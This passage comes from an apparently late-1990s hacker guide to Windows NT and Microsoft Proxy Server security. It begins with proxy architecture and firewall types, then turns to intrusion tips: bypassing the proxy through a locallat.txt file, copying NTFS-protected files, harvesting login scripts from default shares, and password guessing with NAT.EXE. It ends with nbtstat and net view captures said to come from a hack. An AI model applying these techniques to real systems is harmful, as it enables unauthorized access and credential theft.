3880? Intel 486 or higher. RISC support is also available.
3881? 24 MB Ram for Intel chips 32 MB Ram for RISC.
3882? 10 MB Diskspace needed for installation. 100 MB + .5 MB per client for Cache space.
3883? 2 Network interfaces (Adapters, Dial-Up, etc)
3884
3885Following is the suggested minimum software requirements.
3886
3887? Windows NT server 4.0
3888? Internet Information Server 2.0
3889? Service Pack 3
3890? TCP/IP
3891
3892It is highly recommended that it be installed on an NTFS partition. If a NTFS partition is not used,
3893not only are you losing NTFS's advanced security features, but also the caching mechanisms of
3894Proxy Server will not work.
3895
3896It is also recommended that your two network interfaces be configured prior to installation. On
3897interface configured to the external network, and one configured for the internal network. (Note:
3898When configuring your TCP/IP settings, DO NOT configure a default gateway entry for your
3899internal network interface.)
3900
3901? Be sure that "Enable IP Forwarding" is not checked in your TCP/IP settings. This could
3902seriously compromise your internal security.
3903
3904[7.0.5] What is the LAT?
3905
3906This is probably one of the most common questions I am asked as a security professional. The
3907LAT, or Local Address Table, is a series of IP address pairs that define your internal network.
3908Each pair defines a range of IP addresses or a single pair.
3909
3910That LAT is generated upon installation of Proxy Server. It defines the internal IP addresses.
3911Proxy Server uses the Windows NT Routing Table to auto-generate the LAT. It is possible that
3912the when the LAT is auto-generated, that errors in the LATs construction will be found. You
3913should always manually comb through the LAT and check for errors. It is not uncommon to find
3914external IP addresses in the LAT, or entire subnets of your internal IP addresses will not appear
3915on the LAT. It is generally a good idea to have all of your internal IP addresses in the LAT.
3916
3917? NO EXTERNAL IP ADDRESSES SHOULD APPEAR IN YOUR LAT.
3918
3919Upon installing the Proxy Server client software, it adds a file named msplat.txt into the \Mspclnt
3920directory. The msplat.txt file contains the LAT. This file is regularly updated from the server to
3921ensure that the LAT the client is using is current.
3922
3923[7.0.6] What is the LAT used for?
3924
3925Every time a client attempts to use a Winsock application to establish a connection, the LAT is
3926referenced to determine if the IP address the client is attempting to reach is internal or external. If
3927the IP address is internal, Proxy Server is bypassed and the connection is made directly. If the IP
3928address the client is attempting to connect to DOES NOT appear in the LAT, it is determined that
3929the IP address is remote and the connection is made through Proxy Server. By knowing this
3930information, someone on your internal network could easily edit his or her LAT table to bypass
3931Proxy Server.
3932
3933Some Administrators may not see this as a problem because the LAT is regularly updated from
3934the server, so any changes the user made to his or her LAT will be overwritten. However, if the
3935user saves their LAT with the filename Locallat.txt, the client machine will reference both the
3936msplat.txt and the locallat.txt to determine if an IP address is local or remote. So, by using the
3937locallat.txt method, a user can, in theory, permanently bypass Proxy Server. The locallat.txt file is
3938never overwritten unless the user does so manually.
3939
3940[7.0.7] What changes are made when Proxy Server is installed?
3941
3942Server side changes:
3943
3944? The Web Proxy, Winsock Proxy, and SOCKS Proxy services are installed and management
3945items are added into the Internet Service Manager.
3946? An HTML version of the documentation is added into the %systemroot%\help\proxy\
3947directory.
3948? A cache area is created on an NTFS volume.
3949? The LAT table is constructed.
3950? Proxy Server Performance Monitor counters are added.
3951? Client installation and config files are added to the Msp\Clients folder. This folder is shared as
3952Mspclnt and by default has the permissions set to Read for Everyone.
3953
3954Client side changes:
3955? The LAT (msplat.txt) file is copied to the clients local hard drive.
3956? A WSP Client icon is added to control panel on Win3.X, Win95 and WinNT clients.
3957? A Microsoft Proxy Client Program Group is added
3958? The winsock.dll file is replace with Remote WinSock for Proxy. The old winsock file is
3959renamed winsock.dlx.
3960? Mspclnt.ini file is copied to the client machine.
3961
3962[7.0.8] Proxy Server Architecture
3963
3964To understand the architecture of Microsoft Proxy Server, you must first have a basic grasp of
3965how Proxy works for outbound client requests. Here is a simple example:
3966
3967Joe opens his browser to visit his favorite news site on the net. He types in the sites IP address
3968which he has memorized because his visits often, instead of doing his job. The client compares
3969the IP address Joe entered to the LAT table. Because the IP address is not found on the LAT, it is
3970considered external. Since the client has determined that the IP address is external, it knows it
3971must process the request through Proxy Server. The client hands Joe's request to Proxy Server.
3972Proxy Server then checks the IP address against the access control applied by the Administrator.
3973The Administrator has the ability to stop internal employees from visiting certain sites. Since Joe's
3974request is not on the forbidden list applied by the Administrator, Proxy Server executes the
3975request. Proxy contacts the website and requests the document Joe wanted. After Proxy server
3976has received the information it requested, it stored a copy in its cache for later use and hands the
3977request to the client machine. The website pops-up on Joe's browser.
3978
3979[7.0.9] Proxy Server Services: An Introduction
3980
3981? WebProxy: Web Proxy normally functions with both clients and servers. As a server, it
3982receives HTTP requests from internal network clients. As a client, it responds to internal
3983network clients' requests by issuing their requests to a server on the Internet. The interface
3984between the client and server components of the Web Proxy service provides chances to add
3985value to the connections it services. By performing advanced security checks, the Web Proxy
3986does more than relay requests between an internal client and a server on the Internet. The
3987WebProxy service is an extensions of Internet Information Server 3.0. It consists of two
3988following components: The Proxy Server ISAPI Filter and the Proxy Server ISAPI Application.
3989The Web Proxy service is implemented as a DLL (dynamic link library) that uses ISAPI
3990(Internet Server Application Programming Interface) and therefore runs within the IIS WWW
3991process. The WWW Service must installed and running in order for proxy requests to be
3992processed.
3993? WinSock Proxy: WinSock Proxy provides proxy services for windows sockets applications.
3994WinSock Proxy allows winsock applications to function on a LAN and to operate as if it is
3995directly connected to the Internet. The client app uses Windows Sockets APIs to
3996communicate with another application running on an Internet computer. WinSock Proxy
3997intercepts the windows sockets call and establishes a communication path from the internal
3998application to the Internet application through the proxy server. The process is totally
3999transparent to the client. The WinSock Proxy consists of a service running on Proxy Server
4000and a DLL installed on each client. The DLL it relies on is the Remote Winsock DLL that
4001replaced the normal winsock.dll. WinSock Proxy uses a control channel between the client
4002and the server to manage the ability of Windows Sockets messages to be used remotely. The
4003control channel is set up when the WinSock Proxy client DLL is first loaded, and it uses the
4004connectionless UDP protocol. The Winsock Proxy client and the WinSock Proxy service use
4005a simple ack protocol to add reliability to the control channel. The control channel uses UDP
4006port 1745 on the proxy server and client computers.
4007? SOCKS Proxy: Proxy Server supports SOCKS Version 4.3a. Almost all SOCKS V4.0 client
4008applications can run remotely through SOCKS Proxy. SOCKS is a protocol that functions as
4009a proxy. It enables hosts on one side of a SOCKS server to gain full access to hosts on the
4010other side of a SOCKS server, without requiring direct IP access. (To learn more about
4011SOCKS, visit http://www.socks.nec.com/index.html).
4012
4013[7.1.0] Understanding components
4014
4015This area will attempt to better define to the components of the architecture that we have used,
4016but may not have defined.
4017
4018[7.1.1] ISAPI Filter
4019
4020The ISAPI Filter interface is one of the components of the web proxy service. The interface
4021provides an extension that the Web server calls whenever it receives an HTTP request.
4022
4023An ISAPI Filter is called for every request, regardless of the identity of the resource requested in
4024the URL. An ISAPI filter can monitor, log, modify, redirect and authenticate all requests that are
4025received by the Web server. The Web service can call an ISAPI filter DLL's entry point at various
4026times in the processing of a request or response. The Proxy Server ISAPI filter is contained in the
4027w3proxy.dll file. This filter examines each request to determine if the request is a standard HTTP
4028request or not.
4029
4030[7.1.2] ISAPI Application
4031
4032The ISAPI Application is the second of the two web proxy components. ISAPI applications can
4033create dynamic HTML and integrate the web with other service applications like databases.
4034
4035Unlike ISAPI Filters, an ISAPI Application is invoked for a request only if the request references
4036that specific application. An ISAPI Application does not initiate a new process for every request.
4037The ISAPI Application is also contained in the w3proxy.dll file.
4038
4039[7.1.3] Proxy Servers Caching Mechanism
4040
4041Microsoft Proxy Server handles caching in two different ways, Passive and Active caching.
4042
4043? Passive Caching: Passive caching is the basic mode of caching. Proxy Server interposes
4044itself between a client and an internal or external Web site and then intercepts client
4045requests. Before forwarding the request on to the Web server, Proxy Server checks to see if
4046it can satisfy the request from its cache. Normally, in passive caching, Proxy Server places a
4047copy of retrieved objects in the cache and associates a TTL (time-to-live) with that object.
4048During this TTL, all requests for that object are satisfied from the cache. When the TTL is
4049expired, the next client request for that object will prompt Proxy Server to retrieve a fresh
4050copy from the web. If the disk space for the cache is too full to hold new data, Proxy Server
4051removes older objects from the cache using a formula based on age, popularity, and size.
4052? Active Caching: Active Caching works with passive caching to optimize the client
4053performance by increasing the likelihood that a popular will be available in cache, and up to
4054date. Active caching changes the passive caching mechanism by having the Proxy Server
4055automatically generate requests for a set of objects. The objects that are chosen are based
4056on popularity, TTL, and Server Load.
4057
4058[7.1.4] Windows Sockets
4059
4060Windows Sockets is the mechanism for communication between applications running on the
4061same computer or those running on different computers which are connected to a LAN or WAN.
4062Windows Sockets defines a set of standard API's that an application uses to communicate with
4063one or more other applications, usually across a network. Windows Sockets supports initiating an
4064outbound connection, accepting inbound connections, sending and receiving data on those
4065connections, and terminating a session.
4066
4067Windows socket is a port of the Berkeley Sockets API that existed on Unix, with extensions for
4068integration into the Win16 and Win32 application environments. Windows Sockets also includes
4069support for other transports such as IPX/SPX and NetBEUI.
4070
4071Windows Sockets supports point-to-point connection-oriented communications and point-to-point
4072or multipoint connectionless communications when using TCP/IP. Windows Socket
4073communication channels are represented by data structures called sockets. A socket is identified
4074by an address and a port, for example;
4075
4076131.107.2.200:80
4077
4078[7.1.5] Access Control Using Proxy Server
4079
4080[7.1.6] Controlling Access by Internet Service
4081
4082Proxy Server can be configured to provide or restrict access based on Service type. FTP, HTTP,
4083Gopher, and Secure (SSL) are all individually configurable.
4084
4085[7.1.7] Controlling Access by IP, Subnet, or Domain
4086
4087Proxy allows an administrator to control access based on IP Address, Subnet or Domain. This is
4088done by enabling filtering and specifying the appropriate parameters. When configuring this
4089security, you need to decide if you want to grant or deny access to an IP address, subnet, or
4090domain. By configuring Proxy Server correctly, you can also set it up to use the internet as your
4091corporate WAN.
4092
4093[7.1.8] Controlling Access by Port
4094
4095If you are using the WinSock Proxy service, you can control access to the internet by specifying
4096which port is used by TCP and UDP. You can also grant or deny, activate or disable certain ports
4097based on your needs.
4098
4099[7.1.9] Controlling Access by Packet Type
4100
4101Proxy Server can control access of external packets into the internal network by enabling packet
4102filtering on the external interface. Packet filtering intercepts and evaluates packets from the
4103Internet before they reach the proxy server. You can configure packet filtering to accept or deny
4104specific packet types, datagrams, or packet fragments that can pass through Proxy Server. In
4105addition, you can block packets originating from a specific Internet host.
4106
4107The packet filtering provided by Proxy Server is available in two forms, Dynamic and Static.
4108
4109Dynamic packet filtering allows for designed ports to automatically open for transmission, receive,
4110or both. Ports are then closed immediately after connection has been terminated, thereby
4111minimizing the number of open ports and the duration of time that a port is open.
4112
4113Static packet filtering allows manual configuration of which packets are and are not allowed.
4114
4115By default, the following Packet settings are enabled on Proxy Server (by default, ALL packet
4116types are blocked except the ones listed below, known as Exceptions):
4117
4118Inbound ICMP ECHO (Ping)
4119Inbound ICMP RESPONSE (Ping)
4120Inbound ICMP SOURCE QUENCH
4121Inbound ICMP TIMEOUT
4122Inbound ICMP UNREACHABLE
4123Outbound ICMP ANY
4124Inbound TCP HTTP
4125In/Outbound UDP ANY (dns)
4126
4127[7.2.0] Logging and Event Alerts
4128
4129Events that could affect your system may be monitored, and, if they occur, alerts can be
4130generated. The items listed below are events that will generate alerts:
4131
4132Rejected Packets: Watches external adapter for dropped IP packets.
4133Protocol Violations: Watches for packets that do not follow the allowed protocol structure.
4134Disk Full: Watches for failures caused by a full disk.
4135
4136When any of the events above occur, an alert is sent to the system log in the NT Event Viewer, or
4137can be configured to e-mail a pre-defined person.
4138
4139When the system logs information concerning Access Control, it does so to a log file stored in the
4140%systemroot%/system32/msplogs/ directory. The log file itself is named Pfyymmdd.log (Where
4141yy=Current year / mm= Current Month / dd= Current day).
4142
4143The Packet log records information related to the following areas:
4144
4145Service Information (Time of Service, Date and Time)
4146Remote Information (The Source IP Address of a possible Intruder, along with port and protocol
4147used)
4148Local Information (Destination IP Address and port)
4149Filter Information (Action taken and what interface (network adapter) issued the action)
4150Packet Information (Raw IP Header in Hex and Raw IP Packet in Hex)
4151
4152[7.2.1] Encryption Issues
4153
4154Proxy Server can take full advantage of the authentication and security features of Internet
4155Information Server and SSL tunneling.
4156
4157SSL supports data encryption and server authentication. All data sent to and from the client using
4158SSL is encrypted. If HTTP basic authentication is used in conjunction with SSL, the user name
4159and password are transmitted after the client's SSL support encrypts them.
4160
4161If your are wanting to take advantage of PPTP to provide additional flexibility and security for your
4162clients, you can configure Proxy Server to allow these packets (GRE) to pass through.
4163
4164[7.2.2] Other Benefits of Proxy Server
4165
4166[7.2.3] RAS
4167
4168Proxy Server can take full advantage of Windows NT Remote Access Service (RAS). Proxy can
4169be configured to dial on demand when an internal client makes a request that must be satisfied
4170from the external network. The RAS feature can be configured to only allow connectivity during
4171certain hours. The Dial-Up Network Scripting tool can aslo be used to automate certain process
4172using Proxy Server and RAS. For company's who have a standard constant connection (ISDN,
4173T1, T3) to the Internet, the RAS ability provided by Proxy Server can be used as a back-up
4174should your constant connection fail.
4175
4176[7.2.4] IPX/SPX
4177
4178Microsoft Proxy Server was developed with support for Internet Packet Exchange/Sequenced
4179Packet Exchange or IPX/SPX. IPX/SPX is a transport protocol group somewhat similar to TCP/IP.
4180
4181There are many situations when a client computer may have both IPX/SPX and TCP/IP protocols
4182installed although the company's internal network may only use IPX/SPX. Simply disabling
4183aTCP/IP while on the LAN will not get the IPX/SPX component of the Proxy client software
4184working. You will need to go into Control Panel, open the Wsp Client icon and check the box that
4185reads "Force IPX/SPX protocol". This must be done because even though the TCP/IP protocol
4186was disabled, the WinSock Proxy Client still detects its presence and will attempt to create a
4187standard IP socket. By enabling the "Force IPX/SPX Protocol" option, this problem should
4188disappear.
4189
4190[7.2.5] Firewall Strategies
4191
4192A firewall is a system that enforces access control policies. The enforcement is done between an
4193internal, or "trusted" network and an external, or "untrusted" network. The firewall can be as
4194advanced as your standards require. Firewalls are commonly used to shield internal networks
4195from unauthorized access via the Internet or other external network.
4196
4197[7.2.6] Logical Construction
4198
4199The single basic function of a firewall is to block unauthorized traffic between a trusted system
4200and an untrusted system. This process is normally referred to as Filtering. Filtering can be viewed
4201as either permitting or denying traffic access to a network.
4202
4203Firewalls know what traffic to block because they are configured with the proper information. This
4204information is known as an Access Control Policy. The proper approach to an access control
4205policy will depend on the goals of the network security policy and the network administrator.
4206
4207[7.2.7] Exploring Firewall Types
4208
4209In the origins of firewalls, there were two types. These two types have now grown and overlapped
4210each other to the point where distinction is hard. We will explore the differences between these
4211two types and discuss Firewall building topologies.
4212
4213Network Level Firewalls
4214
4215Network level firewalls operate at the IP packet level. Most of these have a network interface to
4216the trusted network and an interface to the untrusted network. They filter by examining and
4217comparing packets to their access control policies or ACL's.
4218
4219Network level firewalls filter traffic based on any combination of Source and Destination IP, TCP
4220Port assignment and Packet Type. Network Level firewalls are normally specialized IP routers.
4221They are fast and efficient and are transparent to network operations. Todays network level
4222firewalls have become more and more complex. They can hold internal information about the
4223packets passing through them, including the contents of some of the data. We will be discussing
4224the following types of network level firewalls:
4225
4226? Bastion Host
4227? Screened Host
4228? Screened Subnet
4229
4230Bastion Host Firewall
4231
4232Bastion host are probably one of the most common types of firewalls. The term bastion refers to
4233the old castle structures used in Europe, mainly for draw bridges.
4234
4235The Bastion host is a computer with at east one interface to the trusted network and one to the
4236untrusted network. When access is granted to a host from the untrusted network by the bastion
4237host, all traffic from that host is allowed to pass unbothered.
4238In a physical layout, bastion hosts normally stand directly between the inside and outside
4239networks, with no other intervention. They are normally used as part of a larger more
4240sophisticated firewall.
4241
4242The disadvantages to a bastion host are:
4243
4244? After an Intruder has gained access, he has direct access to the entire network.
4245? Protection is not advanced enough for most network applications.
4246
4247Screened Host Firewall
4248
4249A more sophisticated network level firewall is the screened host firewall. This firewall uses a
4250router with at least on connection to trusted network and one connection to a bastion host. The
4251router serves as a preliminary screen for the bastion host. The screening router sends all IP traffic
4252to the bastion host after it filters the packets. The router is set up with filter rules. These rules
4253dictate which IP addresses are allowed to connect, and which ones are denied access. All other
4254packet scrutiny is done by the bastion host. The router decreases the amount of traffic sent to the
4255bastion host and simplifies the bastions filtering algorithms.
4256
4257The physical layout of a Screened Host is a router with one connection to the outside network,
4258and the other connection with a bastion host. The bastion host has one connection with the router
4259and one connection with the inside network.
4260
4261Disadvantages to the Screened Host are:
4262
4263? The single screen host can become a traffic bottleneck
4264? If the host system goes down, the entire gateway is down.
4265
4266Screened Subnet Firewalls
4267
4268A screened subnet uses on or more addition routers and on more additional bastion hosts. In a
4269screened subnet, access to and from the inside network is secured by using a group of screened
4270bastion host computers. Each of the bastion hosts acts as a drawbridge to the network.
4271
4272The physical layout of a Screened subnet is somewhat more difficult, but the result is a more
4273secure, robust environment. Normally, there is a router with one connection to the outside
4274network and the other connection to a bastion host. The bastion host has one connection to the
4275outer most router and one connection to another bastion host, with an addressable network in the
4276middle. The inner most bastion host has one connection to the outer most bastion and another
4277connection to an inside router. The inside router has one connection to the inner bastion host and
4278the other connection to the inside network. The result of this configuration is the security
4279components are normally never bogged down with traffic and all internal IP addresses are hidden
4280from the outside, preventing someone from "mapping" your internal network.
4281
4282Disadvantages to using this type of firewall are:
4283
4284? The can be two or three times more expensive than other types of firewalls
4285? Implementation must be done by some type of security professional, as these types of
4286firewalls are not for the un-initiated.
4287
4288Application Level Firewalls
4289
4290 Application level firewalls are hosts running proxy server software located between the protected
4291network and the outside network. Keep in mind that even though Microsofts product is called
4292Proxy Server 2.0, it is actually a stand alone Bastion Host type of system. Microsoft Proxy Server
4293can also, single-handedly, disguise your internal network to prevent mapping. Microsoft Proxy
4294Server 1.0 did not have many of the advanced features presented in version 2.0. The 1.0 version
4295can definitely be called a true proxy server, while the 2.0 version is more of a firewall.
4296
4297Viewed from the client side, a proxy server is an application that services network resource
4298requests by pretending to be the target source. Viewed from the network resource side, the proxy
4299server is accessing network resources by pretending to be the client. Application level firewalls
4300also do not allow traffic to pass directly between to the two networks. They are also able to use
4301elaborate logging and auditing features. They tend to provide more detailed audit reports, but
4302generally, as stand alone security unites, do not perform that well. Remember that an Application
4303level firewall is software running on a machine, and if that machine can be attacked effective and
4304crashed, in effect, youre crashing the firewall.
4305
4306You may wish to use an application level firewall in conjunction with network level firewalls, as
4307they provide the best all around security.
4308
4309[7.2.3] NT Security Twigs and Ends
4310
4311Lets jump right in. For those of you who are not riggers (architecture/network media specialists)
4312let me begin by saying that NT as an operating system is fairly safe and secure. Now you may
4313think to yourself that it isn’t, but think about all the Unix related security holes you know of, a ton
4314huh? Anyhow, as with any operating system, NT has holes, lets see what we can learn about
4315these holes, shall we?
4316
4317 First things first, NT does not support alot of the normal TCP/IP functions that youre used to. NT
4318does not normally support NFS, SunRPC, NIS, r* commands, Telnet, and some other obscure
4319ones.
4320
4321 In order for NT to allow for various system services to be performed on a remote computer, it
4322uses RPC, remote procedure calls. Please do not confuse this with SunRPC. You can run
4323NT/RPC's over a NetBIOS/SMB session or you can piggie back it directly off of TCP/IP (or other
4324transport protocol, perhaps NWLink IPX/SPX). Unfortunately we dont have any good
4325documentation on what inherent services NT provides through native RPC. Complex server type
4326programs (Like Exchange) provide their own RPC services in addition to the ones NT provides as
4327an operating system --(TCP Port 135 is used as a port-mapper port, we also know that if too
4328much information is fed through port 135, you can crash an NT box.). Some client software must
4329access TCP port 135 before accessing the RPC service itself (hint, hint). Keep in mind that TCP
4330port 135 can be blocked. Bummer, eh?
4331 One problem among the Hacker community is that most hackers dont like to investigate new
4332avenues, or explore new methods. They will take the easy way out, using a method thats already
4333been documented by someone else. So what if they come across a system that has patched that
4334security problem? Will todays hacker try to find a new way in? Nope... most of the slackers I know
4335will give up. It is for this reason that alot of the members in the community have never heard of
4336SMBs, because its a session level protocol that is not a Unix standard (although there is
4337something somewhat like SMBs for Unix, known as Samba). SMBs are used by Windows 3.X,
4338Win95, WintNT and OS/2. The one thing to remember about SMBs is that it allows for remote
4339access to shared directories, the registry, and other system services. Which makes it important in
4340our line of, uuuhh, work. As stated above, unfortunately, there is no good documentation of the
4341services that use SMBs.
4342
4343 Now, a couple of Key Points:
4344 SMBs are used by:
4345 -Win 3.X
4346 -Win 95
4347 -Win NT
4348 -OS/2
4349 SMBs allow for remote access to:
4350 -Shared directories
4351 -The Registry
4352 -Other system services
4353
4354 You will find that by default all accounts in NT have complete SMB functionality. This includes
4355the Guest account. (In WinNT 3.51, the guest is auto created and active, in WinNT 4.0, the guest
4356account is auto created but is not active) Now, 2 things to remember: When it comes to login
4357attempt failures, the administrator account IS NEVER locked out after a certain number of login
4358attempts (this rule ALWAYS applies), also by default, when windows NT is installed, NONE of the
4359accounts have fail login attempt lock out. Also, in order for SMB to work, UDP/TCP ports
4360137,138,139 (NetBIOS over TCP) must be open.
4361
4362---A word about Remote registry alteration: By default the Everyone group in NT has write access
4363to much of the registry. In NT 3.51, this was a major issue due to the remote registry access
4364feature of RegEdit. Any user could manipulate the registry on any server or workstation on which
4365his account (or the guest account) was enabled. WindowsNT fixed the problem with this registry
4366key:
4367
4368HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipesServers\winreg
4369
4370Now, true, remote registry editing is not allowed in NT4, but this rule does not apply to
4371Administrator (or perhaps other users in the Administrators group.. ::grin::).
4372
4373 Ok, so far we've covered some pretty good information, but lets go into that new product that
4374microsoft loves so much. The product they really hyped.. NTFS (NewTechnologiesFileSystem).
4375First of all, NTFS is a rip off of the OS/2 file system, HPFS. No biggie, lets not get picky. Anyhow,
4376NTFS is actually a beautiful thing, if used properly. NTFS allows administrator to not only put
4377access permissions on folders, but it also allows for access permissions on individual files within
4378that folder.
4379
4380Example: Jane and Ralph both have access to the folder 'Shoes'. Theres only one file within the
4381'shoes' folder. Only jane has access to this one file, Ralph does not. So when Ralph opens the
4382'shoe' folder, it appears empty, but when Jane opens the 'shoe' folder, the file is there.
4383
4384Now, If an administrator does not set permissions on files within a folder but you know the exact
4385path to the file, you can copy the file out of the folder onto a FAT (File Allocation Table) system,
4386successfully bypassing the security. Example:
4387
4388The folder 'Shoes' has permissions on it. You do not have access permission to the folder, BUT if
4389you typed:
4390
4391 copy c:\shoes\secure.txt a:\
4392
4393 It would allow you to copy the file. Pretty neat huh?
4394
4395I have heard that the latest NT4 patches have corrected this problem, I will let ya know when I get
4396a chance to test it out.
4397
4398File Sharing, I love those words. SMB file and print server protocols used by NT are harder to
4399spoof than the NFS implementation on Unix systems. It is possible that a gateway (and I dont
4400mean the brand name company) machine could spoof an SMB session, then read and write any
4401files to which the true user of the session had access. -WARNING- This method is not for the
4402beginner.
4403
4404Now, windows allows for this wonderful thing called User Profiles. This allows for users to have
4405login scripts, personalized desktops, etc etc. Now some very personal information can be
4406contained within these profiles. For example, some users put the userid and password that they
4407use for Microsoft Mail onto their logon script, this way when they log into the machine, it auto logs
4408them into their mailbox. User profiles are stored in the %SYSTEMROOT%\SYSTEM32\CONFIG
4409directory and also on a shared directory on the server.
4410
4411Lets discuss our little friend, the special share. NT shares the
4412%SYSTEMROOT%\SYSTEM32\REPL\IMPORT\SCRIPTS directory, this way, users can read
4413their login scripts during login. Under normal default conditions, ANYONE can access this share
4414and read anyone elses login script. So whatever juicy pieces of information are in the login script
4415are now yours. Some other special shares are created depending on other software installed on
4416NT or other servers that NT has to cooperate with. These other shares will probably be discussed
4417in another BlackPaper.
4418
4419Getting lucky with that special account. There is a certain type of NT account that has the ability
4420to BackUp and Restore database and account information. Accounts of this type have the ability
4421to read, modify and write any file in the system. So, if ya cant get the Admin account, who
4422knows... maybe theres a backup operator account. Ya never know.
4423
4424
4425==============Part Two==============
4426===================The Techniques for Survival===================
4427
4428
4429[8.0.0] NetBIOS Attack Methods
4430
4431This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server,
4432NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1. One of the components
4433being used is NAT.EXE by Andrew Tridgell. A discussion of the tool, it switches, and common
4434techniques follows:
4435
4436NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>
4437
4438Switches:
4439
4440 -o Specify the output file. All results from the scan
4441 will be written to the specified file, in addition
4442 to standard output.
4443 -u Specify the file to read usernames from. Usernames
4444 will be read from the specified file when attempt-
4445 ing to guess the password on the remote server.
4446 Usernames should appear one per line in the speci-
4447 fied file.
4448 -p Specify the file to read passwords from. Passwords
4449 will be read from the specified file when attempt-
4450 ing to guess the password on the remote server.
4451 Passwords should appear one per line in the speci-
4452 fied file.
4453 <address>
4454 Addresses should be specified in comma deliminated
4455 format, with no spaces. Valid address specifica-
4456 tions include:
4457 hostname - "hostname" is added
4458 127.0.0.1-127.0.0.3, adds addresses 127.0.0.1
4459 through 127.0.0.3
4460 127.0.0.1-3, adds addresses 127.0.0.1 through
4461 127.0.0.3
4462 127.0.0.1-3,7,10-20, adds addresses 127.0.0.1
4463 through 127.0.0.3, 127.0.0.7, 127.0.0.10 through
4464 127.0.0.20.
4465 hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1
4466 through 127.0.0.1
4467 All combinations of hostnames and address ranges as
4468 specified above are valid.
4469
4470[8.0.1] Comparing NAT.EXE to Microsoft's own executables
4471
4472[8.0.2] First, a look at NBTSTAT
4473
4474First we look at the NBTSTAT command. This command was discussed in earlier portions of the
4475book ( [5.0.6] The Nbtstat Command ). In this section, you will see a demonstration of how this
4476tool is used and how it compares to other Microsoft tools and non Microsoft tools.
4477
4478What follows is pretty much a step by step guide to using NBTSTAT as well as extra information.
4479Again, if youre interested in more NBSTAT switches and functions, view the [5.0.6] The Nbtstat
4480Command portion of the book.
4481
4482
4483C:\nbtstat -A XXX.XX.XXX.XX
4484
4485 NetBIOS Remote Machine Name Table
4486
4487 Name Type Status
4488---------------------------------------------
4489STUDENT1 <20> UNIQUE Registered
4490STUDENT1 <00> UNIQUE Registered
4491DOMAIN1 <00> GROUP Registered
4492DOMAIN1 <1C> GROUP Registered
4493DOMAIN1 <1B> UNIQUE Registered
4494STUDENT1 <03> UNIQUE Registered
4495DOMAIN1 <1E> GROUP Registered
4496DOMAIN1 <1D> UNIQUE Registered
4497..__MSBROWSE__.<01> GROUP Registered
4498
4499MAC Address = 00-C0-4F-C4-8C-9D
4500
4501Here is a partial NetBIOS 16th bit listing:
4502
4503Computername <00> UNIQUE workstation service name
4504 <00> GROUP domain name
4505Server <20> UNIQUE Server Service name
4506
4507Computername <03> UNIQUE Registered by the messenger service. This is the computername
4508 to be added to the LMHOSTS file which is not necessary to use
4509 NAT.EXE but is necessary if you would like to view the remote
4510 computer in Network Neighborhood.
4511Username <03> Registered by the messenger service.
4512Domainname <1B> Registers the local computer as the master browser for the domain
4513Domainname <1C> Registers the computer as a domain controller for the domain
4514 (PDC or BDC)
4515Domainname <1D> Registers the local client as the local segments master browser
4516 for the domain
4517Domainname <1E> Registers as a Group NetBIOS Name
4518 <BF> Network Monitor Name
4519 <BE> Network Monitor Agent
4520 <06> RAS Server
4521 <1F> Net DDE
4522 <21> RAS Client
4523
4524[8.0.3] Intro to the NET commands
4525
4526The NET command is a command that admins can execute through a dos window to show
4527information about servers, networks, shares, and connections. It also has a number of command
4528options that you can use to add user accounts and groups, change domain settings, and
4529configure shares. In this section, you will learn about these NET commands, and you will also
4530have the outline to a NET command Batch file that can be used as a primitive network security
4531analysis tool. Before we continue on with the techniques, a discussion of the available options will
4532come first:
4533
4534[8.0.4] Net Accounts: This command shows current settings for password, logon limitations, and
4535domain information. It also contains options for updating the User accounts database and
4536modifying password and logon requirements.
4537
4538[8.0.5] Net Computer: This adds or deletes computers from a domains database.
4539
4540[8.0.6] Net Config Server or Net Config Workstation: Displays config info about the server
4541service. When used without specifying Server or Workstation, the command displays a list of
4542configurable services.
4543
4544[8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE
4545command.
4546
4547[8.0.8] Net File: This command lists the open files on a server and has options for closing shared
4548files and removing file locks.
4549
4550[8.0.9] Net Group: This displays information about group names and has options you can use to
4551add or modify global groups on servers.
4552
4553[8.1.0] Net Help: Help with these commands
4554
4555[8.1.1] Net Helpmsg message#: Get help with a particular net error or function message.
4556
4557[8.1.2] Net Localgroup: Use this to list local groups on servers. You can also modify those
4558groups.
4559
4560[8.1.3] Net Name: This command shows the names of computers and users to which messages
4561are sent on the computer.
4562
4563[8.1.4] Net Pause: Use this command to suspend a certain NT service.
4564
4565[8.1.5] Net Print: Displays print jobs and shared queues.
4566
4567[8.1.6] Net Send: Use this command to send messages to other users, computers, or messaging
4568names on the network.
4569
4570[8.1.7] Net Session: Shows information about current sessions. Also has commands for
4571disconnecting certain sessions.
4572
4573[8.1.8] Net Share: Use this command to list information about all resources being shared on a
4574computer. This command is also used to create network shares.
4575
4576[8.1.9] Net Statistics Server or Workstation: Shows the statistics log.
4577
4578[8.2.0] Net Stop: Stops NT services, cancelling any connections the service is using. Let it be
4579known that stopping one service, may stop other services.
4580
4581[8.2.1] Net Time: This command is used to display or set the time for a computer or domain.
4582
4583[8.2.2] Net Use: This displays a list of connected computers and has options for connecting to
4584and disconnecting from shared resources.
4585
4586[8.2.3] Net User: This command will display a list of user accounts for the computer, and has
4587options for creating a modifying those accounts.
4588
4589[8.2.4] Net View: This command displays a list of resources being shared on a computer.
4590Including netware servers.
4591
4592[8.2.5] Special note on DOS and older Windows Machines: The commands listed above are
4593available to Windows NT Servers and Workstation, DOS and older Windows clients have these
4594NET commands available:
4595
4596Net Config
4597Net Diag (runs the diagnostic program)
4598Net Help
4599Net Init (loads protocol and network adapter drivers.)
4600Net Logoff
4601Net Logon
4602Net Password (changes password)
4603Net Print
4604Net Start
4605Net Stop
4606Net Time
4607Net Use
4608Net Ver (displays the type and version of the network redirector)
4609Net View
4610
4611For this section, the command being used is the NET VIEW and NET USE commands.
4612
4613[8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack.
4614
4615C:\net view XXX.XX.XXX.XX
4616
4617Shared resources at XXX.XX.XXX.XX
4618
4619Share name Type Used as Comment
4620
4621------------------------------------------------------------------------------
4622NETLOGON Disk Logon server share
4623Test Disk
4624The command completed successfully.
4625
4626NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.
4627
4628
